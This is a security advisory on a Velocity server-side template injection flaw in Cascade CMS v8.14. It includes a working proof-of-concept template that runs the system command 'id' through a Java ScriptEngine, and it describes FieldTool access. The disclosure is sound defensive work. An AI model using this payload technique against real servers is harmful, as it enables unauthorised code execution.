Summary
A user with privileges to edit templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running Cascade CMS.
Product
Cascade CMS
Tested Version
Cascade CMS v8.14.cloud5 (57164371131571924e45d18fbd2725f3d8d124d4)
Details
Server-Side Template Injection (Velocity)
Cascade CMS does not use the Velocity SecureUberspector, which allows attackers that are able to modify or create templates to execute arbitrary Java code and achieve remote code execution. For example the following template will run the system id command:
##### $scriptEngine = $currentPage.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js') )
${scriptEngine.eval("var x=new java.lang.ProcessBuilder('id'); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}
In addition, Cascade CMS exposes Velocity FieldTool through the $_FieldTool variable. This tool allows accessing any public static field on any class reachable by the Velocity ClassLoader.
Impact
This issue may lead to Remote Code Execution.
Coordinated Disclosure Timeline
- 04/17/2020: Sent report to vendor.
- 04/17/2020: Vendor acknowledges the issue.
- 04/27/2020: Issue is fixed.
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Munoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include the GHSL-2020-076 in any communication regarding this issue.